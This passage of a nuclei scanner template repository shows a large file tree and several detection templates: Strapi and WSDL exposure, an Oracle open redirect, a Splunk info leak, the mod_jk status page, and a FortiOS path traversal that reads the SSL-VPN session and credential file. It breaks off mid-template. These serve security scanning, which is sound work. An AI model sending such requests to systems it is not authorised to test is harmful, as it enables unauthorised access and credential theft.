├── wordpress-accessible-wpconfig.yaml
├── wordpress-affiliatewp-log.yaml
├── wordpress-bbpress-plugin-listing.yaml
├── wordpress-db-backup-listing.yaml
├── wordpress-db-backup.yaml
├── wordpress-db-repair.yaml
├── wordpress-debug-log.yaml
├── wordpress-directory-listing-1.yaml
├── wordpress-directory-listing-2.yaml
├── wordpress-directory-listing-3.yaml
├── wordpress-directory-listing-4.yaml
├── wordpress-elementor-plugin-listing.yaml
├── wordpress-emails-verification-for-woocommerce-1.yaml
├── wordpress-emails-verification-for-woocommerce-2.yaml
├── wordpress-emergency-script.yaml
├── wordpress-git-config-1.yaml
├── wordpress-git-config-2.yaml
├── wordpress-gtranslate-plugin-listing.yaml
├── wordpress-installer-log.yaml
├── wordpress-rce-simplefilelist.yaml
├── wordpress-rdf-user-enum.yaml
├── wordpress-redirection-plugin-listing.yaml
├── wordpress-social-metrics-tracker.yaml
├── wordpress-tmm-db-migrate.yaml
├── wordpress-total-upkeep-backup-download.yaml
├── wordpress-updraftplus-pem-key.yaml
├── wordpress-user-enum.yaml
├── wordpress-woocommerce-listing.yaml
├── wordpress-woocommerce-sqli-1.yaml
├── wordpress-woocommerce-sqli-2.yaml
├── wordpress-wordfence-lfi.yaml
├── wordpress-wordfence-waf-bypass-xss.yaml
├── wordpress-wordfence-xss.yaml
├── wordpress-wpcourses-info-disclosure.yaml
├── wordpress-xmlrpc-listmethods.yaml
├── wordpress-zebra-form-xss.yaml
├── wp-123contactform-plugin-listing.yaml
├── wp-altair-listing-1.yaml
├── wp-altair-listing-2.yaml
├── wp-altair-listing-3.yaml
├── wp-altair-listing-4.yaml
├── wp-ambience-xss.yaml
├── wp-arforms-listing.yaml
├── wp-church-admin-xss.yaml
├── wp-config-setup.yaml
├── wp-custom-tables-xss.yaml
├── wp-email-subscribers-listing.yaml
├── wp-enabled-registration.yaml
├── wp-finder-xss.yaml
├── wp-flagem-xss.yaml
├── wp-full-path-disclosure.yaml
├── wp-grimag-open-redirect.yaml
├── wp-gtranslate-open-redirect.yaml
├── wp-idx-broker-platinum-listing.yaml
├── wp-install.yaml
├── wp-iwp-client-listing.yaml
├── wp-javospot-lfi.yaml
├── wp-knews-xss.yaml
├── wp-license-file.yaml
├── wp-mailchimp-log-exposure.yaml
├── wp-memphis-documents-library-lfi-1.yaml
├── wp-memphis-documents-library-lfi-2.yaml
├── wp-multiple-theme-ssrf.yaml
├── wp-nextgen-xss.yaml
├── wp-oxygen-theme-lfi.yaml
├── wp-phpfreechat-xss.yaml
├── wp-plugin-1-flashgallery-listing-1.yaml
├── wp-plugin-1-flashgallery-listing-2.yaml
├── wp-plugin-lifterlms.yaml
├── wp-plugin-utlimate-member.yaml
├── wp-popup-listing.yaml
├── wp-prostore-open-redirect.yaml
├── wp-securimage-xss.yaml
├── wp-sfwd-lms-listing.yaml
├── wp-simple-fields-lfi.yaml
├── wp-slideshow-xss.yaml
├── wp-socialfit-xss.yaml
├── wp-super-forms.yaml
├── wp-tinymce-lfi.yaml
├── wp-tutor-lfi.yaml
├── wp-upload-data.yaml
├── wp-vault-lfi.yaml
├── wp-woocommerce-email-verification-1.yaml
├── wp-woocommerce-email-verification-2.yaml
├── wp-woocommerce-file-download.yaml
├── wp-woocommerce-pdf-invoice-listing.yaml
├── wp-xmlrpc.yaml
├── wpdm-cache-session.yaml
├── wpmudev-pub-keys.yaml
├── wptouch-open-redirect.yaml
├── wuzhicms-sqli.yaml
├── xdcms-sqli.yaml
├── yarn-resourcemanager-rce.yaml
├── zabbix-dashboards-access.yaml
├── zabbix-error.yaml
├── zcms-v3-sqli.yaml
├── zenphoto-installation-sensitive-info-1.yaml
├── zenphoto-installation-sensitive-info-2.yaml
├── zenphoto-installation-sensitive-info-3.yaml
├── zenphoto-installation-sensitive-info-4.yaml
├── zenphoto-sensitive-info-1.yaml
├── zenphoto-sensitive-info-2.yaml
├── zenphoto-sensitive-info-3.yaml
├── zenphoto-sensitive-info-4.yaml
├── zhiyuan-file-upload.yaml
├── zhiyuan-oa-info-leak.yaml
├── zhiyuan-oa-session-leak.yaml
├── zhiyuan-oa-unauthorized.yaml
└── zms-auth-bypass.yaml
├── SSRF
├── ApacheSolr-SSRF-1.yaml
├── ApacheSolr-SSRF-2.yaml
├── ApacheSolr-SSRF-3.yaml
├── ApacheSolr-SSRF-4.yaml
├── ApacheSolr-SSRF-5.yaml
├── ApacheSolr-SSRF-6.yaml
├── ApacheStruts-RCE.yaml
├── CVE-2009-4223.yaml
├── CVE-2014-4210-1.yaml
├── CVE-2014-4210-2.yaml
├── CVE-2014-4210-3.yaml
├── CVE-2015-7450.yaml
├── CVE-2015-8813.yaml
├── CVE-2017-0929.yaml
├── CVE-2017-12629.yaml
├── CVE-2017-18638.yaml
├── CVE-2017-3506.yaml
├── CVE-2017-9506.yaml
├── CVE-2018-1000600-1.yaml
├── CVE-2018-1000600-2.yaml
├── CVE-2018-10818.yaml
├── CVE-2018-15517.yaml
├── CVE-2018-16167.yaml
├── CVE-2019-2616.yaml
├── CVE-2019-2767.yaml
├── CVE-2019-3929.yaml
├── CVE-2019-6715.yaml
├── CVE-2019-8451.yaml
├── CVE-2019-9978.yaml
├── CVE-2020-10770.yaml
├── CVE-2020-13117.yaml
├── CVE-2020-14883-1.yaml
├── CVE-2020-14883-2.yaml
├── CVE-2020-24148.yaml
├── CVE-2020-24589.yaml
├── CVE-2020-25506-1.yaml
├── CVE-2020-25506-2.yaml
├── CVE-2020-25506-3.yaml
├── CVE-2020-26919.yaml
├── CVE-2020-28188.yaml
├── CVE-2020-28871.yaml
├── CVE-2020-35713.yaml
├── CVE-2020-5412.yaml
├── CVE-2020-6308.yaml
├── CVE-2020-7796.yaml
├── CVE-2020-8813.yaml
├── CVE-2021-1497.yaml
├── CVE-2021-1498.yaml
├── CVE-2021-20837.yaml
├── CVE-2021-22205.yaml
├── CVE-2021-22214.yaml
├── CVE-2021-24472.yaml
├── CVE-2021-26084-1.yaml
├── CVE-2021-26084-10.yaml
├── CVE-2021-26084-2.yaml
├── CVE-2021-26084-3.yaml
├── CVE-2021-26084-4.yaml
├── CVE-2021-26084-5.yaml
├── CVE-2021-26084-6.yaml
├── CVE-2021-26084-7.yaml
├── CVE-2021-26084-8.yaml
├── CVE-2021-26084-9.yaml
├── CVE-2021-31755.yaml
├── CVE-2021-32305.yaml
├── CVE-2021-32819.yaml
├── CVE-2021-33357.yaml
├── CVE-2021-33544.yaml
├── CVE-2021-3577.yaml
├── CVE-2021-36380.yaml
├── CVE-2021-40438.yaml
├── CVE-2021-42237.yaml
├── Confluence-SSRF.yaml
├── Hashicorp Consul-RCE-1.yaml
├── Hashicorp Consul-RCE-2.yaml
├── JBoss-SSRF.yaml
├── Jenkins-RCE.yaml
├── OpenTSDB-RCE-1.yaml
├── OpenTSDB-RCE-2.yaml
├── PeopleSoft-XXE-1.yaml
├── PeopleSoft-XXE-2.yaml
├── Shellshock-RCE-1.yaml
├── cloudflare-image-ssrf.yaml
├── confluence-ssrf-sharelinks.yaml
├── fastjson-1-2-24-rce-1.yaml
├── fastjson-1-2-24-rce-2.yaml
├── fastjson-1-2-41-rce.yaml
├── fastjson-1-2-42-rce.yaml
├── fastjson-1-2-43-rce.yaml
├── fastjson-1-2-47-rce.yaml
├── fastjson-1-2-62-rce.yaml
├── fastjson-1-2-67-rce.yaml
├── fastjson-1-2-68-rce-1.yaml
├── fastjson-1-2-68-rce-2.yaml
├── fastjson-1-2-68-rce-3.yaml
├── fastjson-1.2.24-rce-1.yaml
├── fastjson-1.2.24-rce-2.yaml
├── fastjson-1.2.41-rce.yaml
├── fastjson-1.2.42-rce.yaml
├── fastjson-1.2.43-rce.yaml
├── fastjson-1.2.47-rce.yaml
├── fastjson-1.2.62-rce.yaml
├── fastjson-1.2.67-rce.yaml
├── fastjson-1.2.68-rce-1.yaml
├── fastjson-1.2.68-rce-2.yaml
├── fastjson-1.2.68-rce-3.yaml
├── hashicorp-consul-rce.yaml
├── hasura-graphql-ssrf.yaml
├── linkerd-ssrf-detect.yaml
├── mirai-unknown-rce.yaml
├── netgear-wnap320-rce.yaml
├── oob-header-based-interaction.yaml
├── oob-param-based-interaction.yaml
├── optilink-ont1gew-gpon-rce.yaml
├── sar2html-rce.yaml
├── ssrf-via-oauth-misconfig.yaml
├── targa-camera-ssrf.yaml
├── umbraco-base-ssrf-1.yaml
├── umbraco-base-ssrf-2.yaml
├── umbraco-base-ssrf-3.yaml
├── wp-xmlrpc-pingback-detection.yaml
├── xmlrpc-pingback-ssrf.yaml
└── zimbra-preauth-ssrf.yaml
└── Technologies
├── abyss-web-server.yaml
├── achecker-detect.yaml
├── acontent-detect.yaml
├── adobe-coldfusion-detect-1.yaml
├── adobe-coldfusion-detect-2.yaml
├── adobe-coldfusion-detect-3.yaml
├── adobe-coldfusion-detect-4.yaml
├── adobe-coldfusion-detect-5.yaml
├── adobe-coldfusion-detect-6.yaml
├── adobe-coldfusion-detector-1.yaml
├── adobe-coldfusion-detector-2.yaml
├── adobe-coldfusion-detector-3.yaml
├── adobe-coldfusion-detector-4.yaml
├── adobe-coldfusion-detector-5.yaml
├── adobe-coldfusion-detector-6.yaml
├── adobe-coldfusion-detector-error.yaml
├── adobe-coldfusion-error-detect.yaml
├── aem-detection.yaml
├── airflow-detect.yaml
├── apache-axis-detect-1.yaml
├── apache-axis-detect-2.yaml
├── apache-axis-detect-3.yaml
├── apache-detect.yaml
├── apache-guacamole.yaml
├── artica-web-proxy-detect.yaml
├── autobahn-python-detect.yaml
├── avantfax-detect.yaml
├── aviatrix-detect.yaml
├── aws-bucket-service.yaml
├── aws-cloudfront-service.yaml
├── aws-elastic-beanstalk-detect.yaml
├── basic-auth-detection.yaml
├── bedita-detect.yaml
├── bigbluebutton-detect.yaml
├── bigip-config-utility-detect-1.yaml
├── bigip-config-utility-detect-2.yaml
├── bigip-config-utility-detect-3.yaml
├── bigip-detection.yaml
├── bolt-cms-detect.yaml
├── bookstack-detect.yaml
├── brother-printer-detect.yaml
├── burp-api-detect.yaml
├── cacti-detect-1.yaml
├── cacti-detect-2.yaml
├── carestream-vue-detect-1.yaml
├── carestream-vue-detect-2.yaml
├── centreon-detect.yaml
├── chevereto-detect.yaml
├── clockwork-php-page.yaml
├── cockpit-detect.yaml
├── confluence-detect-1.yaml
├── confluence-detect-2.yaml
├── confluence-detect-3.yaml
├── confluence-detect-4.yaml
├── contacam.yaml
├── craft-cms-detect.yaml
├── crush-ftp-detect.yaml
├── daybyday-detect.yaml
├── default-apache-test-all.yaml
├── default-apache-test-page.yaml
├── default-apache2-page.yaml
├── default-apache2-ubuntu-page.yaml
├── default-asp-net-page.yaml
├── default-asp.net-page.yaml
├── default-centos-test-page.yaml
├── default-codeigniter-page.yaml
├── default-detect-generic.yaml
├── default-django-page.yaml
├── default-fastcgi-page.yaml
├── default-fedora-page.yaml
├── default-glassfish-server-page.yaml
├── default-ibm-http-server.yaml
├── default-iis7-page.yaml
├── default-jetty-page.yaml
├── default-lucee-page.yaml
├── default-microsoft-azure-page.yaml
├── default-movable-page.yaml
├── default-nginx-page.yaml
├── default-openresty.yaml
├── default-oracle-application-page.yaml
├── default-payara-server-page.yaml
├── default-plesk-page.yaml
├── default-redhat-test-page.yaml
├── default-ssltls-test-page.yaml
├── default-tomcat-page.yaml
├── default-windows-server-page.yaml
├── dell-idrac6-detect.yaml
├── dell-idrac7-detect.yaml
├── dell-idrac8-detect.yaml
├── dell-idrac9-detect.yaml
├── detect-sentry.yaml
├── dolibarr-detect.yaml
├── dotclear-detect-2.yaml
├── dotclear-detect.yaml
├── druid-detect.yaml
├── eg-manager-detect.yaml
├── elasticsearch-sql-client-detect.yaml
├── elfinder-detect-1.yaml
├── elfinder-detect-2.yaml
├── epmp-login.yaml
├── epson-wf-series.yaml
├── fanruanoa-detect-1.yaml
├── fanruanoa-detect-2.yaml
├── fanruanoa2012-detect.yaml
├── fastjson-version.yaml
├── fatpipe-mpvpn-detect.yaml
├── fatpipe-warp-detect.yaml
├── favicon-detection.yaml
├── fingerprinthub-web-fingerprints.yaml
├── firebase-detect.yaml
├── firebase-urls.yaml
├── froxlor-detect.yaml
├── gespage-detect.yaml
├── getsimple-cms-detect-1.yaml
├── getsimple-cms-detect-2.yaml
├── getsimple-cms-detector.yaml
├── gilacms-detect-1.yaml
├── gilacms-detect-2.yaml
├── gitea-detect-1.yaml
├── gitea-detect-2.yaml
├── glpi-cms-detect-1.yaml
├── glpi-cms-detect-2.yaml
├── glpi-cms-detect-3.yaml
├── google-bucket-service.yaml
├── google-storage.yaml
├── grav-cms-detect.yaml
├── graylog-api-browser.yaml
├── gunicorn-detect.yaml
├── harbor-detect.yaml
├── herokuapp-detect.yaml
├── hikvision-detection-1.yaml
├── hikvision-detection-2.yaml
├── home-assistant.yaml
├── hp-blade-admin-detect.yaml
├── hp-device-info-detect.yaml
├── hp-laserjet-detect.yaml
├── hp-media-vault-detect.yaml
├── ibm-http-server.yaml
├── ibm-sterling-detect.yaml
├── ilo-detect.yaml
├── influxdb-detect.yaml
├── internet-service.yaml
├── iplanet-web-server.yaml
├── itop-detect.yaml
├── jaspersoft-detect.yaml
├── jeedom-detect.yaml
├── jellyfin-detect-2.yaml
├── jellyfin-detect-3.yaml
├── jellyfin-detect-4.yaml
├── jellyfin-detect.yaml
├── jenkins-detect.yaml
├── jitsi-meet.yaml
├── jolokia.yaml
├── jsf-detection.yaml
├── kevinlab-device-detect-1.yaml
├── kevinlab-device-detect-2.yaml
├── kibana-detect-1.yaml
├── kibana-detect-2.yaml
├── kibana-detect-3.yaml
├── kong-detect.yaml
├── kubernetes-enterprise-manager.yaml
├── kubernetes-mirantis.yaml
├── kubernetes-version.yaml
├── landrayoa-detect.yaml
├── liferay-portal-detect-1.yaml
├── liferay-portal-detect-2.yaml
├── lighttpd-default.yaml
├── linkerd-badrule-detect.yaml
├── linkerd-service-detect.yaml
├── liveview-axis-camera.yaml
├── lotus-domino-version-1.yaml
├── lotus-domino-version-2.yaml
├── lotus-domino-version-3.yaml
├── lotus-domino-version-4.yaml
├── lotus-domino-version-5.yaml
├── lotus-domino-version-6.yaml
├── lotus-domino-version-7.yaml
├── lucee-detect.yaml
├── lutron-iot-default-login.yaml
├── magento-detect-1.yaml
├── magento-detect-2.yaml
├── magmi-detect.yaml
├── maian-cart-detect.yaml
├── mautic-crm-detect.yaml
├── metabase-detect.yaml
├── microsoft-exchange-server-detect.yaml
├── microstrategy-detect-1.yaml
├── microstrategy-detect-10.yaml
├── microstrategy-detect-11.yaml
├── microstrategy-detect-12.yaml
├── microstrategy-detect-13.yaml
├── microstrategy-detect-14.yaml
├── microstrategy-detect-15.yaml
├── microstrategy-detect-16.yaml
├── microstrategy-detect-2.yaml
├── microstrategy-detect-3.yaml
├── microstrategy-detect-4.yaml
├── microstrategy-detect-5.yaml
├── microstrategy-detect-6.yaml
├── microstrategy-detect-7.yaml
├── microstrategy-detect-8.yaml
├── microstrategy-detect-9.yaml
├── mobotix-guest-camera.yaml
├── moinmoin-detect.yaml
├── mrtg-detect-1.yaml
├── mrtg-detect-2.yaml
├── mrtg-detect-3.yaml
├── netsweeper-webadmin-detect-1.yaml
├── netsweeper-webadmin-detect-2.yaml
├── network-camera-detect.yaml
├── nextcloud-detect-1.yaml
├── nextcloud-detect-2.yaml
├── nextcloud-detect-3.yaml
├── nexus-detect.yaml
├── nginx-linux-page.yaml
├── nginx-version.yaml
├── nifi-detech-1.yaml
├── nifi-detech-2.yaml
├── nifi-detech-3.yaml
├── nifi-detech-4.yaml
├── nifi-detech-5.yaml
├── nifi-detech-6.yaml
├── nifi-detech-7.yaml
├── node-red-detect.yaml
├── nuuno-network-login.yaml
├── oauth2-detect.yaml
├── octobercms-detect-1.yaml
├── octobercms-detect-2.yaml
├── oidc-detect.yaml
├── olivetti-crf-detect.yaml
├── oneblog-detect.yaml
├── open-mjpg-streamer.yaml
├── openam-detection-1.yaml
├── openam-detection-10.yaml
├── openam-detection-11.yaml
├── openam-detection-12.yaml
├── openam-detection-13.yaml
├── openam-detection-14.yaml
├── openam-detection-2.yaml
├── openam-detection-3.yaml
├── openam-detection-4.yaml
├── openam-detection-5.yaml
├── openam-detection-6.yaml
├── openam-detection-7.yaml
├── openam-detection-8.yaml
├── openam-detection-9.yaml
├── opencast-detect.yaml
├── opensis-detect-1.yaml
├── opensis-detect-2.yaml
├── openx-detect.yaml
├── operations-automation-default-page.yaml
├── oracle-dbass-detect.yaml
├── oracle-dbcs.yaml
├── oracle-http-server-12c.yaml
├── oracle-iplanet-web-server.yaml
├── owasp-juice-shop-detected.yaml
├── panasonic-network-management.yaml
├── pega-detect.yaml
├── php-proxy-detect-1.yaml
├── php-proxy-detect-2.yaml
├── phpcollab-detect.yaml
├── pi-hole-detect.yaml
├── plone-cms-detect.yaml
├── prometheus-exposed-panel.yaml
├── prtg-detect-1.yaml
├── prtg-detect-2.yaml
├── prtg-detect-3.yaml
├── redcap-detector.yaml
├── redmine-cli-detect.yaml
├── remkon-manager-detect.yaml
├── rhymix-cms-detect.yaml
├── s3-detect.yaml
├── sage-detect.yaml
├── sap-igs-detect.yaml
├── sap-netweaver-detect.yaml
├── sap-netweaver-webgui.yaml
├── sap-web-dispatcher-admin-portal.yaml
├── sap-web-dispatcher.yaml
├── sceditor-detect.yaml
├── seeddms-detect.yaml
├── selea-ip-camera.yaml
├── shiro-detect.yaml
├── shopizer-detect-1.yaml
├── shopizer-detect-2.yaml
├── shopware-detect-1.yaml
├── shopware-detect-2.yaml
├── sitecore-default-page.yaml
├── sitecore-version.yaml
├── sonicwall-email-security-detect.yaml
├── springboot-actuator-1.yaml
├── springboot-actuator-2.yaml
├── sql-server-reporting.yaml
├── stem-audio-table-private-keys.yaml
├── strapi-cms-detect.yaml
├── synology-web-station.yaml
├── targa-camera-lfi.yaml
├── tech-detect.yaml
├── telerik-dialoghandler-detect-1.yaml
├── telerik-dialoghandler-detect-10.yaml
├── telerik-dialoghandler-detect-11.yaml
├── telerik-dialoghandler-detect-12.yaml
├── telerik-dialoghandler-detect-13.yaml
├── telerik-dialoghandler-detect-14.yaml
├── telerik-dialoghandler-detect-15.yaml
├── telerik-dialoghandler-detect-16.yaml
├── telerik-dialoghandler-detect-2.yaml
├── telerik-dialoghandler-detect-3.yaml
├── telerik-dialoghandler-detect-4.yaml
├── telerik-dialoghandler-detect-5.yaml
├── telerik-dialoghandler-detect-6.yaml
├── telerik-dialoghandler-detect-7.yaml
├── telerik-dialoghandler-detect-8.yaml
├── telerik-dialoghandler-detect-9.yaml
├── telerik-fileupload-detect.yaml
├── teradici-pcoip.yaml
├── terraform-detect.yaml
├── thinkcmf-detection.yaml
├── tileserver-gl.yaml
├── tomcat-detect.yaml
├── tor-socks-proxy.yaml
├── unauthorized-brother-access-detect.yaml
├── upnp-device.yaml
├── vmware-version-detect.yaml
├── vmware-vrealize-detect.yaml
├── voipmonitor-detect.yaml
├── waf-detect.yaml
├── wazuh-detect.yaml
├── web-ftp-detect.yaml
├── weblogic-detect.yaml
├── webmodule-ee.yaml
├── werkzeug-debugger-detect.yaml
├── wondercms-detect.yaml
├── wordpress-gotmls-detect.yaml
├── wso2-apimanager-detect.yaml
├── wuzhicms-detect.yaml
├── xampp-default-page.yaml
├── xp-webcam.yaml
├── xxljob-admin-detect.yaml
├── yapi-detect.yaml
└── yzmcms-detect.yaml
/Templates/APIs/strapi-page-1.yaml:
--------------------------------------------------------------------------------
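# Strapi default-page detection: requests "/" and reports a match when the
# response contains the Strapi welcome text.
#
# The id originally read "strapi-page 1". An id with whitespace does not match
# the file name, is awkward to select or exclude by id, and is rejected by
# current nuclei id validation (confirm against the engine version in use).
id: strapi-page-1

info:
  name: Strapi Page
  author: dhiyaneshDk
  severity: info
  reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22
  tags: api,strapi

requests:
  - payloads:
      # Absolute path on the template author's machine; it must be replaced
      # with a wordlist that exists on the host running the scan.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    # NOTE(review): `sniper` appears to be the older name of this attack mode;
    # newer engine releases call it `batteringram` — confirm before running.
    attack: sniper
    # 100 concurrent requests per target; lower this for rate-limited or
    # fragile hosts.
    threads: 100

    raw:
      # The Host header is filled from the wordlist, one value per request.
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      - type: word
        words:
          # NOTE(review): the listing showed this word split across two lines,
          # which would fold into a leading space and change what is matched.
          # It is joined here to agree with strapi-page-2. The reference
          # queries http.title, so the upstream word may have carried markup
          # that this listing lost — confirm against the upstream template.
          - 'Welcome to your Strapi app'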
--------------------------------------------------------------------------------
/Templates/APIs/strapi-page-2.yaml:
--------------------------------------------------------------------------------
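# Strapi default-page detection: requests "/docs" and reports a match when the
# response contains the Strapi welcome text.
#
# The id originally read "strapi-page 2". An id with whitespace does not match
# the file name, is awkward to select or exclude by id, and is rejected by
# current nuclei id validation (confirm against the engine version in use).
id: strapi-page-2

info:
  name: Strapi Page
  author: dhiyaneshDk
  severity: info
  reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22
  tags: api,strapi

requests:
  - payloads:
      # Absolute path on the template author's machine; it must be replaced
      # with a wordlist that exists on the host running the scan.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    # NOTE(review): `sniper` appears to be the older name of this attack mode;
    # newer engine releases call it `batteringram` — confirm before running.
    attack: sniper
    # 100 concurrent requests per target; lower this for rate-limited or
    # fragile hosts.
    threads: 100

    raw:
      # The Host header is filled from the wordlist, one value per request.
      - |
        GET /docs HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # A bare word match with no status check: any response carrying this
      # text counts as a hit.
      - type: word
        words:
          - 'Welcome to your Strapi app'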
--------------------------------------------------------------------------------
/Templates/APIs/wsdl-api.yaml:
--------------------------------------------------------------------------------
# WSDL exposure check: requests "/?wsdl" and reports a match when the response
# contains the string "wsdl:definitions".
id: wsdl-api

info:
  name: wsdl-detect
  description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/)
  author: jarijaas
  severity: info
  tags: exposure,api

requests:
  - attack: sniper
    # 100 concurrent requests per target.
    threads: 100
    payloads:
      # Absolute path on the template author's machine; not portable as written.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      # The Host header is filled from the wordlist, one value per request.
      - |
        GET /?wsdl HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      # Single word matcher; no status code or response part is constrained.
      - type: word
        words:
          - "wsdl:definitions"
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2017-3528.yaml:
--------------------------------------------------------------------------------
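# Oracle E-Business Suite open-redirect check: sends a `redirect` parameter
# pointing at example.com and reports a match when the response body embeds
# that value in a frame `src` attribute.
id: CVE-2017-3528

info:
  name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
  author: 0x_Akoko
  severity: low
  reference: |
    - https://blog.zsec.uk/cve-2017-3528/
    - https://www.exploit-db.com/exploits/43592
  # `cve,cve2017` added so that tag-based selection (for example, everything
  # tagged `cve`) picks this template up like the other CVE templates on this
  # page; the original tags were only `oracle,redirect`.
  tags: cve,cve2017,oracle,redirect

requests:
  - payloads:
      # Absolute path on the template author's machine; it must be replaced
      # with a wordlist that exists on the host running the scan.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    # NOTE(review): `sniper` appears to be the older name of this attack mode;
    # newer engine releases call it `batteringram` — confirm before running.
    attack: sniper
    # 100 concurrent requests per target; lower this for rate-limited or
    # fragile hosts.
    threads: 100

    raw:
      # The Host header is filled from the wordlist, one value per request.
      - |
        GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1
        Host: {{Subdomains}}

    matchers:
      - type: word
        words:
          # Keep the single quotes: inside double quotes YAML would treat the
          # backslash as the start of an escape sequence.
          - 'noresize src="/\example.com?configName='
        part: body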
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11409-1.yaml:
--------------------------------------------------------------------------------
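# Splunk server-info disclosure check (path variant under /en-US/splunkd):
# reports a match when the endpoint answers 200 and the response contains
# "licenseKeys".
#
# The id originally read "CVE-2018-11409 1". An id with whitespace does not
# match the file name, is awkward to select or exclude by id, and is rejected
# by current nuclei id validation (confirm against the engine version in use).
id: CVE-2018-11409-1

info:
  name: Splunk Sensitive Information Disclosure
  author: harshbothra_
  severity: medium
  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
  tags: cve,cve2018,splunk

requests:
  - payloads:
      # Absolute path on the template author's machine; it must be replaced
      # with a wordlist that exists on the host running the scan.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    # NOTE(review): `sniper` appears to be the older name of this attack mode;
    # newer engine releases call it `batteringram` — confirm before running.
    attack: sniper
    # 100 concurrent requests per target; lower this for rate-limited or
    # fragile hosts.
    threads: 100

    raw:
      # The Host header is filled from the wordlist, one value per request.
      - |
        GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1
        Host: {{Subdomains}}
    # Both matchers must hold: HTTP 200 and the word "licenseKeys".
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - licenseKeys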
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11409-2.yaml:
--------------------------------------------------------------------------------
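# Variant of the CVE-2018-11409 check that requests the Splunk server-info
# endpoint directly under /__raw (no /en-US/splunkd prefix). A hit needs
# HTTP 200 and the string "licenseKeys" in the response.
#
# The id was "CVE-2018-11409 2"; it now matches the file name and has no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: CVE-2018-11409-2

info:
  name: Splunk Sensitive Information Disclosure
  author: harshbothra_
  severity: medium
  reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
  tags: cve,cve2018,splunk

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - licenseKeys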
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11759-1.yaml:
--------------------------------------------------------------------------------
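# Checks whether the mod_jk status page is reachable at /jkstatus
# (CVE-2018-11759). A hit needs HTTP 200 and the page title text
# "JK Status Manager" in the response.
#
# The id was "CVE-2018-11759 1"; it now matches the file name and has no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: CVE-2018-11759-1

info:
  name: Apache Tomcat JK Status Manager Access
  author: harshbothra_
  severity: medium
  reference: https://github.com/immunIT/CVE-2018-11759
  tags: cve,cve2018,apache

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /jkstatus HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "JK Status Manager"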
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-11759-2.yaml:
--------------------------------------------------------------------------------
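# Checks whether the mod_jk status page is reachable when the path carries a
# trailing ';' (/jkstatus;), as covered by CVE-2018-11759. A hit needs HTTP 200
# and the text "JK Status Manager" in the response.
#
# The id was "CVE-2018-11759 2"; it now matches the file name and has no space.
# NOTE(review): ids containing whitespace are presumably rejected by nuclei
# releases that validate template ids; confirm against the version in use.
id: CVE-2018-11759-2

info:
  name: Apache Tomcat JK Status Manager Access
  author: harshbothra_
  severity: medium
  reference: https://github.com/immunIT/CVE-2018-11759
  tags: cve,cve2018,apache

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /jkstatus; HTTP/1.1
        Host: {{Subdomains}}

    # Both matchers must succeed.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "JK Status Manager"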
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-13379.yaml:
--------------------------------------------------------------------------------
# FortiOS SSL-VPN check for CVE-2018-13379. One request is sent per wordlist
# entry, with the entry used as the Host header.
id: CVE-2018-13379

info:
  name: FortiOS - Credentials Disclosure
  author: organiccrap
  severity: high
  tags: cve,cve2018,fortios

requests:
  - attack: sniper
    threads: 100
    payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt

    raw:
      - |
        GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
        Host: {{Subdomains}}

    # NOTE(review): the only condition is the literal "var fgt_lang"; there is
    # no status check and nothing that inspects the returned content, so a hit
    # presumably needs manual confirmation before it is reported.
    matchers:
      - type: word
        words: ['var fgt_lang']
--------------------------------------------------------------------------------
/Templates/CVE/CVE-2018-14574.yaml:
--------------------------------------------------------------------------------
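# Detection check for CVE-2018-14574 (Django open redirect). The request path
# is the scheme-relative URL //www.example.com. A hit needs a 301 whose
# Location header points at the reserved domain example.com.
id: CVE-2018-14574

info:
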